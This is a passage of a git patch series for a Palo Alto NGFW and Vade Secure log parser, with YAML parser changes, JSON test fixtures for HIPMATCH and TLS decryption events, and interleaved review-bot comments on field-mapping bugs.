From: LenaigKaliou Date: Wed, 20 Nov 2024 16:17:44 +0100 Subject: [PATCH 067/150] fix on linting --- VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 3dae6aab9..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,21 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details.spf: - description: The result of the Sender Policy Framework (SPF) - name: vadesecure.auth_results_details.spf - type: keyword - vadesecure.auth_results_details.dkim: description: The result of the DomainKeys Identified Mail (DKIM) name: vadesecure.auth_results_details.dkim type: keyword vadesecure.auth_results_details.dmarc: - description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) name: vadesecure.auth_results_details.dmarc type: keyword +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:00 +0100 Subject: [PATCH 068/150] chore(PaloAlto): name some columns --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c81ad890e 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:44 +0100 Subject: [PATCH 069/150] fix(PaloAlto): fix the definition of the user properties --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/network_threat_alert_2.json | 6 +++--- .../paloalto-ngfw/tests/test_file_alert_json.json | 6 +++--- Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c81ad890e..b7ec21cac 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -810,8 +810,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 
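Review bot: The corrected e-mail split is only applied to `user.*`, while `source.user.name`, derived from the same `SourceUser` value, is still split on backslash only, so a UPN-style user yields `user.name: jdoe` next to `source.user.name: jdoe@example.org` (the hipmatch fixture added later in this series pins exactly that). Note also that this puts a DNS mail domain into ECS `user.domain`, which for `DOMAIN\user` values holds the NetBIOS/AD domain (`example` in the decryption fixture), so rules keyed on `user.domain` will see both kinds of value; if that is intended, say so in fields.yml. Mirroring the split for `source.user` keeps the two views consistent; the enclosing `set` list continues outside the hunk.
```yaml
      # … unchanged: user.email split and source.user backslash split …
      - set:
          source.user.domain: '{{final.source.user.name.split("@") | last}}'
          source.user.name: '{{final.source.user.name.split("@") | first}}'
        filter: '{{final.source.user.name != null and "@" in final.source.user.name}}'
```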
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:09:32 +0100 Subject: [PATCH 070/150] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..952e819e2 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:23:49 +0100 Subject: [PATCH 071/150] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/globalprotect_csv.json | 1 + .../paloalto-ngfw/tests/globalprotect_csv_2.json | 1 + .../paloalto-ngfw/tests/test_globalprotect.json | 1 + .../paloalto-ngfw/tests/test_hipmatch_json.json | 6 +++++- .../paloalto-ngfw/tests/test_new_globalprotect.json | 1 + 6 files changed, 11 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index b7ec21cac..ba7fd4535 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -592,7 +592,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" 
@@ -617,7 +617,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" 
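Review bot: `HipMatchName` is the name of the HIP object or profile that matched, not a security-policy rule, yet it now lands in `rule.name` as a fallback to `Rule` (the new fixture pins `rule.name: "VPN Compliant"`), so detections keyed on `rule.name` will see posture-profile names mixed with policy-rule names. Consider keeping the HIP name in a vendor field such as `paloalto.hip.match_name: "{{parsed_event.message.HipMatchName}}"` alongside `paloalto.hip.match_type: "{{parsed_event.message.HipMatchType}}"`, which the fixture shows is currently dropped (`profile` appears nowhere in the expected output). If the `rule.name` fallback is kept for convenience, document the overload in fields.yml. The enclosing `set` stage starts and ends outside the hunk.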
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json index 952e819e2..b0b294778 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", @@ -69,4 +73,4 @@ "name": "jdoe" } } -} +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:27:19 +0100 Subject: [PATCH 072/150] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-ngfw/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ba7fd4535..ea07e1d10 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json 
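Review bot: The new column list spells the HIP match type `HIPMatchType`, while the JSON representation of the same log (the fixture added two commits earlier) calls it `HipMatchType` and the neighbouring `HipMatchName` column already follows the JSON spelling; any stage that later reads this field will see only one of the two formats, so rename the column to `HipMatchType`. `SourceAddress`/`MachineName` here also differ from `SourceIP`/`EndpointDeviceName` in the JSON form; the `host.name` fallback chain covers `MachineName` and `source.ip` is populated in both fixtures, but every column whose name does not match its JSON twin is a place where the two dialects can silently diverge. A one-line comment above the list naming the PAN-OS HIP Match syslog field order it was transcribed from, e.g. `# Field order per PAN-OS 10.x HIP Match log syslog format`, would let the next maintainer verify it.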
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001 
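Review bot: The expected output pins `action.type: "0"` and `paloalto.Threat_ContentType: "0"` because the CSV record carries `0` in the Subtype column (`HIPMATCH,0,1111,...`), whereas the JSON fixture for the same log type yields `hipmatch` for both fields, so one event kind gets two different `action.type` values depending on transport format. Either the CSV Subtype should be normalised to `hipmatch` when it is `0` (the stage that maps Subtype is outside this commit), or the divergence should be documented in the parser so nobody "fixes" one side later. `event.dataset: hipmatch` is consistent across both fixtures, so consumers can key on that in the meantime.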
From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:02:45 +0100 Subject: [PATCH 073/150] fix(PaloAlto): improve support for decryption events --- .../paloalto-ngfw/_meta/fields.yml | 17 ++- .../paloalto-ngfw/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 118 ++++++++++++++++++ 3 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ea07e1d10..c4abfd388 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
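Review bot: The descriptions for `paloalto.tls.chain_status` and `paloalto.tls.root_status` ("The trust in the TLS chain") do not say what the values are; the decryption fixture added in this commit shows `ChainStatus: Trusted` and `RootStatus: trusted`, i.e. free-text verdicts whose casing differs between the two, which matters to anyone writing a detection on them. Suggest `description: Trust verdict for the server certificate chain as reported by the firewall (ChainStatus, e.g. Trusted/untrusted; casing follows the source)` and the equivalent wording for the root CA. The unrelated edit lower-casing the `paloalto.vsys` description to `the virtual system` looks accidental and breaks the capitalisation used by the surrounding entries.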
@@ -651,6 +651,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -795,6 +802,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json 
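Review bot: `tls.cipher` reads `parsed_event.message.message.TLS_AUTH` — the doubled `.message` can never resolve, and the JSON form names that field `TLSAuth` anyway, so the cipher is never set (the new JSON fixture's `tls` block has `curve`, `version`, `server.hash` and `issuer.common_name` but no `cipher`). The same JSON/CSV naming split silently drops `tls.server.x509.subject.common_name` and `serial_number` for JSON events (`CommonName`/`CertificateSerial` there versus `SubjectCommonName`/`CertificateSerialNumber` in the CSV list); use `{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}`, `{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}` and `{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}`. Even when filled, `TLS_ECDHE_AES_256_GCM_SHA384` is not an IANA cipher-suite name (the authentication algorithm is absent), which ECS `tls.cipher` expects, so a comment such as `# approximation built from PAN-OS fields, not an IANA suite name` would stop it being matched against suite lists. `tls.version` via `TLSVersion[3:]` gives `1.2` for `TLS1.2` but deserves a comment about non-`TLS` prefixes, and `tls.version_protocol: tls` would complete the ECS pair; the enclosing `set` stage continues outside the hunk.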
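Review bot: The decryption fixture shows a session that policy allowed but whose TLS handshake failed (`ErrorIndex: Protocol`, `ErrorMessage: General TLS protocol error...`), yet neither field is mapped, so the event surfaces as `event.outcome: success` with no trace of the decryption failure — exactly the signal an analyst looking for inspection bypass or broken chains wants. Suggest adding, next to the new `paloalto.tls.*` lines, `error.message: "{{parsed_event.message.ErrorMessage or parsed_event.message.Error}}"` and `error.type: "{{parsed_event.message.ErrorIndex}}"` (the CSV column list in the next commit names the message column `Error`), with matching fields.yml entries. Whether `ErrorIndex` is a stable category worth `error.type` should be confirmed against the PAN-OS decryption log reference; the enclosing `set` block starts outside the hunk.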
@@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default 